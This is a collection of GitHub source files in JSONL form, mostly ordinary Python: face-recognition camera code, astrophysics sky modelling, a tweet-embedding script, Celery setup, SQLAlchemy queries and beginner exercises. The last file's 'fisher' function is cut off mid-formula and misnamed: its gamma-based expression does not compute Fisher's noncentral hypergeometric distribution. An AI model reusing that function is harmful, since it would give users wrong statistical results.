encoding\\npicture moved\", 'green'))\n                self.moveImage(namePic)\n                continue\n\n            results = face_recognition.compare_faces([exit_man_encoding], search_encoding)# compare the faces\n            print(results)\n            if (results[0] == True):\n\n                try:\n                    storage.delete(\"images/\" + namePic + \".jpg\")\n                except Exception:\n                    print(colored(\"problem with the STORAGE delete\",'green'))\n\n                try:\n                    db.child(\"person\").child(namePic).remove(user['idToken'])\n                except Exception:\n                    print(colored(\"problem with the DATABASE delete\",'green'))\n\n\n\n\n                theDeletPic = image_dir_basepath + namePic\n                print(\"will delete \"+theDeletPic)\n                shutil.rmtree(theDeletPic)# delete the stored photos\n\n                print(\"deleted\")\n                return\n        print(\"NOT FOUND\")\n\n        pass\n\n    def run(\n            self):  ########################################################################################################\n\n        print(\"2-Camera found new face!\")\n        frame = self.frame\n\n        for face in self.faces:\n            photo = PhotoIndexes()\n            i = 0\n\n            while not i == self.n_img_per_person:  # stop once n_img_per_person pictures have been taken\n                (x, y, w, h) = face_utils.rect_to_bb(face)\n                cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n                self.PrintPicture(photo, self.cam, x - 20, y - 80, w + 40, h + 120)\n                i += 1  # number of pictures per person (=1)\n\n            Index.indexImg = 0\n            display.clear_output(wait=True)\n\n        print(\"exited\")\n\n\n\n\nclass PhotoIndexes():\n    synchronyzed = 1\n\n    def __init__(self):\n        Thread.__init__(self)\n\n        self.created = False  # boolean for not duplicate mkdir\n        self.no=Index.indexPhotog\n        Index.indexPhotog+=1\n        self.pathDir = \"\"\n        self.nameImgDIR = \"\"\n\n\nclass FaceDemo(object):############### the camera pointing at nothing\n    def __init__(self, cascade_path):\n        self.vc = None\n        self.predictor = cascade_path\n        self.margin = 10\n        self.batch_size = 1\n        self.n_img_per_person = 10\n        self.is_interrupted = False\n        self.data = {}\n\n\n    def _signal_handler(self, signal, frame):\n        self.is_interrupted = True\n\n    def capture_images(self , name='Unknown'):\n        cam = VideoStream(1).start() #######################################################################################################\n#####################################################################################################################\n        self.vc=cam\n\n\n\n\n\n        fig = plt.figure(0)\n        fig.canvas.set_window_title('Entrance')\n        Index.NbFaces = 0\n        detector = dlib.get_frontal_face_detector()#dlib\n        predictor = dlib.shape_predictor(predictor_path)\n\n\n\n        while True:\n\n            frame = cam.read()\n            # frame = imutils.resize(frame, width=400)\n            Index.cam=cam\n            gray = frame\n            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)## convert the frame to grayscale for the detector\n            # faces = detector(gray, 0)\n            faces = detector(gray, 0)\n\n            Index.faces = faces\n\n            if len(faces)!=0:\n\n                Index.frame=frame\n                for face in faces:\n\n                    
# predict the 68 facial landmark positions for this face\n                    shape = predictor(gray, face)\n                    shape = face_utils.shape_to_np(shape)\n                    for (x, y) in shape:##shape.length=68\n                        cv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\n\n                    # (x, y, w, h) = face_utils.rect_to_bb(face)\n                    # cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n\n                if len(faces) > Index.NbFaces:\n\n\n                    print('1-create new thread')\n\n                    thread1 = Camera(cam,faces,frame)\n                    thread1.start()\n\n\n            cv2.imshow(\"Frame\",frame)\n            # plt.title(\"Found {0} faces!\".format(len(faces)))\n            # plt.xticks([])\n            # plt.yticks([])\n            # display.clear_output(wait=True)\n\n            Index.NbFaces = len(faces)\n\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n\n                break\n\n        cv2.destroyAllWindows()\n        cam.stop()\n\n\nprint(colored(\"start\",'blue'))\nf = FaceDemo(predictor_path)\nf.capture_images('ENTER')\n","repo_name":"sschwarcz/SmartCity","sub_path":"ExitCam.py","file_name":"ExitCam.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39886608523","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n__author__ = 'Administrator'\r\n__time__ = '2016/4/29'\r\n\"\"\"\r\nimport codecs\r\nfrom JsFormat import *\r\nfrom Log import *\r\nfrom AnlyConfigFile import *\r\n\r\n\r\ndef WtToFile(fp, num, data):\r\n    assert isinstance(fp, basestring)\r\n    assert isinstance(data, list)\r\n    assert isinstance(num, int)\r\n    if not data:\r\n        return 0\r\n    n = 0\r\n    if os.path.exists(fp):\r\n        os.unlink(fp)\r\n    fw = codecs.open(fp, mode='w', encoding='utf-8')\r\n    try:\r\n        contPre = GetJsPreFix()\r\n        fw.write(contPre)\r\n        fw.write('=[')\r\n        fw.write('\\n')\r\n        for line in data:\r\n            fw.write('\\t')\r\n            v1 = line[0]\r\n            v2 = line[1]\r\n            line = '{\"name\":\"%s\",\"value\":%s}' % (v1, v2)\r\n            fw.write(line)\r\n            fw.write(',') if n < num-1 else 0\r\n            n += 1\r\n            fw.write('\\n')\r\n        fw.write(']')\r\n        return 1\r\n    except Exception as we:\r\n        Log('ERROR', 'WtToFile Occur Exception : %s' % we.message)\r\n        return 0\r\n    finally:\r\n        fw.close()\r\n\r\n\r\n\r\n","repo_name":"GIS90/python_base_use","sub_path":"ETJ/Core/WtToFile.py","file_name":"WtToFile.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11677084249","text":"# Built-in modules\nimport numpy as np\nimport sys as sy\ntry:\n    import h5py as hp\nexcept ImportError:\n    sy.stderr.write(\n        \"BoloCalc Import Error: h5py not installed.\\n\"\n        \"As of BoloCalc v0.10.0, h5py is used to load ATM profiles\\n\"\n        \"Use pip to install via 'pip install h5py'\\n\"\n        \"Or, if using an Anaconda environment, 'conda install h5py'\\n\")\nimport os\n\n# BoloCalc modules\nimport src.foregrounds as fg\n\n\nclass Sky:\n    \"\"\"\n    Sky object contains the foregrounds and atmosphere\n\n    Args:\n        tel (src.Telescope): parent Telescope object\n\n    Parents:\n        tel (src.Telescope): Telescope object\n    \"\"\"\n    def __init__(self, tel):\n        # Store passed parameters\n        self.tel = tel\n        self._log = self.tel.exp.sim.log\n        self._phys = self.tel.exp.sim.phys\n        self._load = self.tel.exp.sim.load\n        self._infg = self.tel.exp.sim.param(\"infg\")\n        self._atm_file = self.tel.exp.sim.atm_file\n\n        # Initialize foregrounds\n        if self._infg:\n            self._log.log(\"Initializing foregrounds in Sky object\")\n            self._fg = fg.Foregrounds(self)\n        else:\n            self._fg = None\n        # Maximum and minimum allowed PWV\n        self._max_pwv = 8.0\n        self._min_pwv = 0.0\n        # Allowed site names\n        self._allowed_sites = [\n            \"ATACAMA\", \"POLE\", \"MCMURDO\", 
\"SPACE\", \"CUST\"]\n\n # ***** Public Methods ******\n def evaluate(self, sky_temp, pwv, elev, freqs):\n \"\"\"\n Generate the sky elements, absorbtivities, transmissions,\n and temperatures\n\n Args:\n pwv (float): PWV\n elev (float): elevation\n freqs (float): frequencies [Hz] at which to evlauate the sky\n \"\"\"\n site = self.tel.param(\"site\").upper()\n # Custom sky effective brightness temperature\n if sky_temp != \"NA\":\n Nsky = ['Sky' for f in freqs]\n Tsky = [sky_temp for f in freqs]\n Esky = [1. for f in freqs]\n Asky = [1. for f in freqs]\n return [[Nsky],\n [Asky],\n [Esky],\n [Tsky]]\n elif site in self._allowed_sites:\n # Check that an atmosphere exists\n if site != 'SPACE':\n Natm = ['ATM' for f in freqs]\n Tatm, Eatm = self._atm_spectrum(pwv, elev, freqs)[1:]\n Aatm = [1. for f in freqs]\n # Won't look at the atmosphere from space, probably\n else: # site = 'SPACE'\n pass # no atmosphere\n else: \n self._log.err(\n \"Could not understand site '%s' defined for telescope '%s'\\n\"\n \"Allowed options: %s, or a float.\" % (\n site.lower().capitalize(), self.tel.name,\n ', '.join(self._allowed_sites)))\n\n Ncmb = ['CMB' for f in freqs]\n Tcmb = [self._phys.Tcmb for f in freqs]\n Ecmb = [1. for f in freqs]\n Acmb = [1. for f in freqs]\n # Include foregrounds\n if self._infg:\n Nsyn = ['SYNC' for f in freqs]\n Tsyn = self._syn_temp(freqs)\n Esyn = [1. for f in freqs]\n Asyn = [1. for f in freqs]\n Ndst = ['DUST' for f in freqs]\n Tdst = self._dst_temp(freqs)\n Edst = [1. for f in freqs]\n Adst = [1. for f in freqs]\n if site != 'SPACE':\n return [[Ncmb, Nsyn, Ndst, Natm],\n [Acmb, Asyn, Adst, Aatm],\n [Ecmb, Esyn, Edst, Eatm],\n [Tcmb, Tsyn, Tdst, Tatm]]\n else:\n return [[Ncmb, Nsyn, Ndst],\n [Acmb, Asyn, Adst],\n [Ecmb, Esyn, Edst],\n [Tcmb, Tsyn, Tdst]]\n # Do not include foregrounds\n else:\n if site != 'SPACE':\n return [[Ncmb, Natm],\n [Acmb, Aatm],\n [Ecmb, Eatm],\n [Tcmb, Tatm]]\n else:\n return [[Ncmb],\n [Acmb],\n [Ecmb],\n [Tcmb]]\n\n def pwv_sample(self):\n \"\"\" Sample the PWV distribution \"\"\"\n samp = self.tel.pwv_sample()\n # Minimum allowed PWV is 0 mm\n if samp < self._min_pwv:\n self._log.log('Cannot have PWV %.1f < %.1f. Using %.1f instead'\n % (samp, self._min_pwv, self._min_pwv))\n return self._min_pwv\n # Maximum allowed PWV is 8 mm\n elif samp > self._max_pwv:\n self._log.log('Cannot have PWV %.1f > %.1f. 
Using %.1f instead'\n % (samp, self._max_pwv, self._max_pwv))\n return self._max_pwv\n else:\n return samp\n\n # ***** Helper Methods *****\n def _hdf5_select(self, pwv, elev):\n \"\"\" Retrieve ATM spectrum from HDF5 file \"\"\"\n # Two-level dictionary structure in the HDF5 file\n site = self.tel.param(\"site\").lower().capitalize()\n # McMurdo need camel casing\n if site == \"Mcmurdo\":\n site = \"McMurdo\"\n key = \"%d,%d\" % (pwv, elev)\n with hp.File(\"%s\" % (self._atm_file), \"r\") as hf:\n data = hf[site][key]\n freq = data[0]\n temp = data[2]\n tran = data[3]\n return (freq, tran, temp)\n\n def _atm_spectrum(self, pwv, elev, freqs):\n \"\"\" Atmosphere spectrum given a PWV and elevation \"\"\"\n GHz_to_Hz = 1.e+09\n m_to_mm = 1.e+03\n mm_to_um = 1.e+03\n # Load custom ATM file if present\n if self.tel.param(\"atm_file\") is not None:\n freq, tran, temp = self._load.atm(self.tel.param(\"atm_file\"))\n # Otherwise, select the atmosphere from the HDF5 file\n else:\n freq, tran, temp = self._hdf5_select(\n int(round(pwv * m_to_mm, 1) * mm_to_um),\n int(round(elev, 0)))\n # Massage arrays\n freq = (freq * GHz_to_Hz).flatten().tolist()\n temp = np.interp(freqs, freq, temp).flatten().tolist()\n tran = np.interp(freqs, freq, tran).flatten().tolist()\n return freq, temp, tran\n\n def _syn_temp(self, freqs):\n \"\"\" Synchrotron physical temperature spectrum \"\"\"\n return self._fg.sync_temp(freqs)\n\n def _dst_temp(self, freqs):\n \"\"\" Dust spectrum \"\"\"\n return self._fg.dust_temp(freqs)\n","repo_name":"chill90/BoloCalc","sub_path":"src/sky.py","file_name":"sky.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"38168397841","text":"def collect(lst, item):\n if item not in lst:\n lst.append(item)\n return lst\n\n\ndef drop(lst, item):\n if item in lst:\n lst.remove(item)\n return lst\n\n\ndef combine(lst, command):\n temporary_lst = command.split(':')\n if temporary_lst[0] in lst:\n lst.insert(lst.index(temporary_lst[0]) + 1, temporary_lst[1])\n return lst\n\n\ndef renew(lst, item):\n if item in lst:\n lst.remove(item)\n lst.append(item)\n return lst\n\n\njournal_lst = input().split(', ')\n\nwhile True:\n prompt_lst = input().split(' - ')\n if prompt_lst[0] == 'Craft!':\n break\n elif prompt_lst[0] == 'Collect':\n journal_lst = collect(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Drop':\n journal_lst = drop(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Combine Items':\n journal_lst = combine(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Renew':\n journal_lst = renew(journal_lst, prompt_lst[1])\n\nprint(*journal_lst, sep=', ')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Midterm Exam Preparation/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40718426378","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\n\nimport sentry_sdk\nfrom celery import Celery\nfrom sentry_sdk.integrations.celery import CeleryIntegration\n\nfrom concordia.version import get_concordia_version\n\nSENTRY_BACKEND_DSN = os.environ.get(\"SENTRY_BACKEND_DSN\", None)\n\nif SENTRY_BACKEND_DSN:\n CONCORDIA_ENVIRONMENT = os.environ.get(\"CONCORDIA_ENVIRONMENT\", None)\n sentry_sdk.init(\n SENTRY_BACKEND_DSN,\n environment=CONCORDIA_ENVIRONMENT,\n 
release=get_concordia_version(),\n integrations=[CeleryIntegration()],\n )\n\napp = Celery(\"concordia\")\n\n# Using a string here means the worker doesn't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request))\n","repo_name":"LibraryOfCongress/concordia","sub_path":"concordia/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"52"} +{"seq_id":"26869095787","text":"from typing import List\nfrom cgen.type import Type\nfrom cgen.statement import Statement\nfrom cgen.loop import loop_until, LOOP_ITERATOR\nfrom cgen.function import PRINTF\nfrom cgen.variable import Variable\nfrom cgen.literal import Literal\nfrom cgen.expression import Expression\nfrom cgen.type import INT\nfrom cgen.code import Code\n\n\nclass StructField:\n def __init__(self, data_type: Type, name):\n self.data_type = data_type\n self.name = name\n\n\nclass Struct(Type):\n def __init__(self, name: str, fields: List[StructField]):\n super().__init__(name, is_struct=True)\n self.fields = fields\n\n def define(self):\n fields_body = '\\n'.join([f' {p.data_type.render()} {p.name};' for p in self.fields])\n ret = f'struct {self.name} {{\\n'\n ret += fields_body\n ret += '\\n};'\n return Statement(ret)\n\n def print_formatted(self, var: Variable, size: Expression):\n literal_map = {\n INT: \"%d\"\n }\n\n with Code() as body:\n PRINTF.call(\n Literal(';'.join([f'{field.name}: {literal_map[field.data_type]}' for field in self.fields]) + '\\\\n'),\n *[var.at(LOOP_ITERATOR).field(field.name) for field in self.fields]\n )\n\n loop_until(size, body)\n\n # var = Variable()\n # PRINTF.call(Literal('%d\\\\n'), var_child_output.at(Literal(0)).field('Col2'))\n","repo_name":"tokoko/substrait-ml","sub_path":"cgen/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34985573694","text":"#!/usr/bin/python3\n\"\"\"script that prints the State object with\nthe name passed as argument from the database hbtn_0e_6_usa\"\"\"\n\nfrom model_state import Base, State\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import sessionmaker\nimport sqlalchemy\nfrom sys import argv\n\nif __name__ == \"__main__\":\n Base = declarative_base()\n Session = sessionmaker()\n enginestr = 'mysql+mysqldb://'\n engine = sqlalchemy.create_engine(\n \"{}{}:{}{}/{}\".format(enginestr, argv[1], argv[2],\n '@localhost:3306', argv[3]))\n Session.configure(bind=engine)\n session = Session()\n instances = session.query(State).filter(\n State.name == argv[4]).order_by(State.id).all()\n if instances:\n for instance in instances:\n print(\"{}\".format(instance.id))\n else:\n print(\"Not 
found\")\n","repo_name":"trevor-ofarrell/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25394954361","text":"#exercicios_cap5_pag88\n\n#ex5.6 Altere o programa para exibir os resultados no mesmo formato de uma tabuada : 2x1=2...\nn = int(input(\"tabuada de: \"))\nx = 1\nwhile x <=10:\n r =(n*x)\n x=x+1\n print(f\"{n} x {x-1} = {r}\")\n\n#ex5.7 modifique o programa anterior de forma que o usuario tambpem digite o inicio e o fim da tabuada em vez de começar com 1 e 10.\nn = int(input(\"tabuada de: \"))\ninicio = int(input(\"De: \"))\nfim = int(input(\"Até: \"))\nx = inicio\nwhile x <= fim:\n print(f\"{n} x {x} = {n*x}\")\n x=x+1\n\n#ex5.8 Escreva um programa que leia dois numeros. imprima o resultado da multiplicação do primeiro pelo segundo. Utilize apenas operadores de soma e subtração para calcular o resultado. Lembre-se de que podemos entender a multiplicação de dois numeros como a soma sucessiva de um deles. assim: 4x2 = 2 + 2 + 2 + 2.\nn1 = int(input(\"digite o primeiro numero: \"))\nn2 = int(input(\"digite o segundo numero: \"))\nx = 1\nr = 0\nwhile x <= n2:\n r = r + n1\n x = x + 1\nprint(f\"{n1} x {n2} = {r}\")\n\n#ex5.9 escreva um prog que leia dois numeros. imprima a divisão inteira do primeiro pelo segundo, assim com oo resto da divisão. utilize apenas os operadores de soma e subtração para calcular o resultado.\nn1 = int(input(\"digite o primeir numero: \"))\nn2 = int(input(\"digite o segundo numero: \"))\nquociente = 0\nx = n1\nif n2 <= 0:\n print(\"da matemática não existe divisão por zero, escolha outro numero: \")\nelse:\n while x >= n1:\n x = x - n2\n quociente = quociente + 1\n resto = x\n print(f\"{n1}/{n2} = {quociente} (quociente) {r} (resto)\")\n \n \n \n\n","repo_name":"GaybsGimenez/python_exercises","sub_path":"cap5/exercicios_cap5_pag88.py","file_name":"exercicios_cap5_pag88.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44436928956","text":"# INPUT: -v \n# -d (defaults to short dataset)\n# -meth (defaults to mean vector of word embeddings)\n\n# OUTPUT: npy of embedded tweets: embedded-datasets____/embedded_.npy\n\nimport os\nimport pickle\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.insert(1, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) ) # little hack. 
https://stackoverflow.com/questions/4383571/importing-files-from-different-folder\nimport constants\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) # to fetch word-embeddings and write tweet-embeddings to the same dir as the embedding method (GLOVE)\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"-v\", type=str, required=True, help=\"vocabulary (without path, without extension)\")\n parser.add_argument(\"-d\", choices=[\"train-short\", \"train-full\"], default=\"train-short\", help=\"training dataset (to choose which embedding to use)\")\n parser.add_argument(\"-meth\", choices=[\"mean\", \"raw\"], default=\"mean\")\n parser.add_argument(\"to_embed\", help=\"tweets to embed\", choices=[\"test_data\", \"train_neg_full\", \"train_neg\", \"train_pos_full\", \"train_pos\"])\n args = parser.parse_args()\n\n # create output dir if it doesn't exist yet\n outdir = os.path.join(CURRENT_DIR, f\"embedded-datasets__{args.d}__{args.v}__{args.meth}\")\n os.makedirs(outdir, exist_ok=True)\n\n with open(os.path.join(constants.DATASETS_PATH, f\"{args.to_embed}.txt\")) as f:\n tweets = f.readlines()\n\n ET = create_EmbedTweets(vocab_fn=args.v, dataset_fn=args.d, method=args.meth)\n \n # dummy_embedd_tw = ET.embed([\"hello\", \"world\"]) # to get the shape of the output\n # res = np.empty((len(tweets), *dummy_embedd_tw.shape))\n # for tweetnb, tweet in enumerate(tweets):\n # res[tweetnb] = ET.embed(tweet)\n res = np.array([ET.embed(tweet) for tweet in tweets])\n\n np.save(os.path.join(outdir, f\"embedded_{args.to_embed}.npy\"), res)\n\n\ndef create_EmbedTweets(vocab_fn, dataset_fn, method):\n \"\"\"A kind of \"factory\" function to create EmbedTweets from vocab and (training) dataset filenames\n Args: \n vocab_fn (string): vocabulary filename (without path, without extension)\n dataset_fn (\"train-short\" or \"train-full\"): training dataset\n method (\"mean\" or \"raw\"): method to use for embedding tweets\n \"\"\"\n # read vocabulary\n with open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"{vocab_fn}.pkl\"), \"rb\") as inputfile:\n vocab = pickle.load(inputfile)\n # read embedding\n with np.load(os.path.join(CURRENT_DIR,f\"embeddings__{dataset_fn}__{vocab_fn}.npz\")) as data:\n xs = data['xs']\n ys = data['ys']\n return EmbedTweets(vocab, xs, ys, method)\n\n\nclass EmbedTweets:\n \"\"\"Embed tweets into a vector using a word-embedding\n Attributes:\n word_to_index (dict {str: int}): inverse mapping of vocab\n xys (np.ndarray): concatenation of xs and ys with shape (VOCAB_SIZE, EMBEDDING_DIM)\n in some models we ignore the x/y separation and take the embedding of word i to be xys[i]=(xs[i],ys[i])\n VOCAB_SIZE (int)\n X_EMBEDDING_DIM (int)\n EMBEDDING_DIM (int)\n oov_vector (np.ndarray): fixed vector representing out-of-vocabulary words, with shape (EMBEDDING_DIM,)\n Parameters:\n vocab (list of str): vocab[i] is the word i\n xs (np.ndarray): x embedding with shape (VOCAB_SIZE, X_EMBEDDING_DIM)\n ys (np.ndarray): y embedding\n method (\"mean\" or \"raw\"): method to use for embedding tweets\n \"\"\"\n def __init__(self, vocab, xs, ys, method):\n self.vocab = vocab\n self.xs = xs\n self.ys = ys\n assert method in [\"mean\", \"raw\"]\n self.method = method\n \n self.word_to_index = {}\n for i in range(len(vocab)):\n self.word_to_index[vocab[i]] = i\n\n self.xys = np.concatenate((xs, ys), axis=1)\n self.VOCAB_SIZE = len(vocab)\n self.X_EMBEDDING_DIM = xs.shape[1]\n self.EMBEDDING_DIM = 2*xs.shape[1]\n\n self.oov_vector = np.zeros((self.EMBEDDING_DIM,)) # TODO: maybe use a 
different policy for unknown words\n\n    def embed(self, tweet):\n        if self.method == \"mean\":\n            return self.embed_tweet_by_mean_vector(tweet)\n        elif self.method == \"raw\":\n            return self.embed_tweet_by_padded_concat(tweet)\n        else: raise ValueError(\"method should be 'mean' or 'raw'\")\n\n    def embed_tweet_by_mean_vector(self, tweet):\n        \"\"\"Represent the tweet by the mean of its word embeddings\n        Returns: \n            embedded_tweet (np.ndarray): with shape (EMBEDDING_DIM,)\n        \"\"\"\n        words = tweet.split()  # tokenize first: iterating the raw string would loop over characters, not words\n        l = [ self.xys[self.word_to_index[word]] if word in self.vocab else self.oov_vector for word in words ]\n        return np.mean(np.array(l), axis=0)\n\n    def embed_tweet_by_padded_concat(self, tweet, max_tweet_length=30, pad_mode=0.):\n        \"\"\"Represent the tweet by the concatenation of its word embeddings (\"raw\" embedding)\n        - If tweet is longer than max_tweet_length, truncate it\n        - If tweet is shorter than max_tweet_length, pad with pad_mode (by default, 0's)\n        Rk: this method can be really heavy and is mainly there for convenience and testing\n        Args:\n            pad_mode (str or function or float): the padding mode for https://numpy.org/doc/stable/reference/generated/numpy.pad.html\n                if float, pad with constant value (over all dimensions of the embedding)\n        Returns:\n            embedded_tweet (np.ndarray): with shape (EMBEDDING_DIM*max_tweet_length,)\n        \"\"\"\n        words = tweet.split()[:max_tweet_length]  # tokenize and truncate to max_tweet_length, as documented above\n        l = [ self.xys[self.word_to_index[word]] if word in self.vocab else self.oov_vector for word in words ]\n        concated = np.concatenate(l, axis=0)  # the word vectors are 1-D, so concatenate along axis 0 into one flat vector\n        if len(words) < max_tweet_length:\n            diff = self.EMBEDDING_DIM*( max_tweet_length-len(words) )\n            if isinstance(pad_mode, str):\n                concated = np.pad(concated, (0,diff), mode=pad_mode)\n            elif isinstance(pad_mode, (int, float)):\n                concated = np.pad(concated, (0,diff), constant_values=pad_mode)\n            else: raise ValueError\n        assert concated.shape == (max_tweet_length*self.EMBEDDING_DIM,)\n        return concated\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"cmimprota/CSR","sub_path":"algorithms/fresh_glove_embedding/embed_tweets.py","file_name":"embed_tweets.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2277505931","text":"import cv2\n\nimg = cv2.imread(\"../../../../res/faces.jpeg\", cv2.IMREAD_COLOR)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\neyes_classifier = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n\neyes = eyes_classifier.detectMultiScale(gray, scaleFactor=1.20, minNeighbors=20, minSize=(10, 10))\nprint(len(eyes))\n\nfor (x, y, w, h) in eyes:\n    cx = (x + x + w) / 2\n    cy = (y + y + h) / 2\n    cv2.circle(img, (int(cx), int(cy)), int(w / 2), (255, 0, 255), 4)\n\ncv2.imshow(\"Eyes\", img)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"DastanIqbal/LearnOpenCV","sub_path":"src/LinkedInLearning/course/cv/04/eyes.py","file_name":"eyes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40342883464","text":"# PYTHON FUNCTION: It also allows source to repeat multiple times (iteration)\n\n# Stages of function:\n# 1.) Function declaration: def functionName(): [for a function without parameter] OR\n    #def functionName(param_a, param_b): [for a function with parameter]\n# 2.) Function definition: print(\"I'm a function\")\n# 3.) Function invocation:\n\n# def parameter(): \n#     print(\"I am a function\")\n# parameter()\n\n# Types of Function:\n# 1.) 
A Parameterized Function: accepts one or more parameters (arguments)\n# Example: \n# def print_name(name):\n#     print('My name is', name)\n# print_name('Benjamin')\n\n# 2.) Non-parameterized Function: takes no arguments\n# Example:\n# def parameter(): \n#     print(\"I am a function\")\n# parameter()\n\n# Addition\ndef addition(add1, add2=1):\n    add = add1 + add2\n    print(add)\n# addition(10) \n\ndef addd(val1, val2):\n    val = val1 + val2\n    print(val)\n# addd(val1=(int(input('First Value: '))), val2=(int(input('Second Value: ')))) \n\n# def sum(val1=(int(input('First Value: '))), val2=(int(input('Second Value: ')))):\n#     print(val1 + val2)\n# sum()\n\ndef addition(add1, add2=1):\n    add = add1 + add2\n    return add # return keeps the value while print displays the value\n# print('The sum is, ',addition(10))\n\nimport sys\ndef landingPage():\n    print(\"\"\"\n    WELCOME\n    1. Sign In \n    2. Sign Up\n    3. Exit\n    \"\"\")\n    user = (input(\"Choose an option: \"))\n    if user == \"1\":\n        signIn()\n    elif user == \"2\":\n        signUp()\n    elif user == \"3\":\n        print('Terminated!')\n        sys.exit() \n    else:\n        print('Invalid Input')\n        landingPage() \n    \n\ndef signIn():\n    print(f\"\"\"\n    SIGN IN OPTIONS \n    1. To continue\n    2. Don't have an account yet?\n    0. Back \n    \"\"\") \n    inp = (input(\"Choose Option: \"))\n    if inp == '1':\n        name = input('Enter your name: ') \n        email = input('Email: ')\n        phoneNumber = int(input('Phone Number: ')) \n        print(f'''\n        Welcome \n        Name: {name.upper()} Email: {email.strip()} Phone Number: {phoneNumber}\n        ''')\n        signIn_Inner()\n    elif inp == '2':\n        signUp() \n    elif inp == '0':\n        landingPage()\n\ndef signIn_Inner():\n    inp = input('How can we be of help to you? ')\n    print(f\"\"\"\n    Your request is {inp.capitalize()}.\\n\n    We will get back to you later. Thank you.\n    \"\"\")\ndef signUp(): \n    print('''\n    SIGN UP OPTIONS\n    1. To continue\n    2. For More Inquiry\n    3. Menu\n    00. Exit\n    ''')\n    inp2 = (input(\"Choose Option: \"))\n    if inp2 == '1':\n        print(\"\"\"\n        You are welcome\n        1. To enter your details\n        0. Back\n        \"\"\")\n        inp2 = (input(\"Choose Option: \"))\n        if inp2 == '1':\n            name = input('Enter your name: ') \n            email = input('Email: ')\n            phoneNumber = int(input('Phone Number: ')) \n            gender = input('Gender: ')\n            marital = input('Marital Status: ')\n            age = int(input('Age: '))\n            print(f'''\n            Welcome \n            Name: {name.upper()} Email: {email.strip()} Phone Number: {phoneNumber}\n            Gender: {gender.capitalize()} Marital Status: {marital.capitalize()} Age: {age}\n            ''')\n            print('Press any key to continue and 00 to exit')\n            inp3 = (input(\"Choose Option: \"))\n            if inp3 == '00':\n                print('Terminated!')\n                sys.exit()\n            else:\n                signIn_Inner() \n\n    elif inp2 == '2':\n        print(\"Error\") \n        sys.exit()  # must be called; the bare attribute access is a no-op\n    elif inp2 == '3':\n        landingPage() \n    elif inp2 == '00': \n        print('Exit')\n        sys.exit()  # must be called; the bare attribute access is a no-op\n    else:\n        print('Invalid Input!')\n        signUp()\n\ndef signUp_Inner():\n    pass \nlandingPage()\n\n\n# RECURSIVE FUNCTION:\n","repo_name":"Bentimi/Assignment","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18607242384","text":"\"\"\"\nFisher's noncentral hypergeometric distribution\n\nhttps://en.wikipedia.org/wiki/Fisher%27s_noncentral_hypergeometric_distribution\n\n\"\"\"\n__all__ = ['fisher']\n\nfrom math import gamma\n\ndef fisher(x, m, n):\n    \"\"\"\n    x = 1\nm = 0\nn = 1\npdf = fisher(x, m, n)\nprint(\"PDF of the Fisher distribution with m={}, n={} at x={}: {}\".format(m, n, x, pdf))\n\n    \"\"\"\n    num = gamma((n + 1) / 2) * ((x - m) ** ((n - 1) / 2))\n    den = (gamma(n / 2) * ((n * 3.14159265358979323846) ** 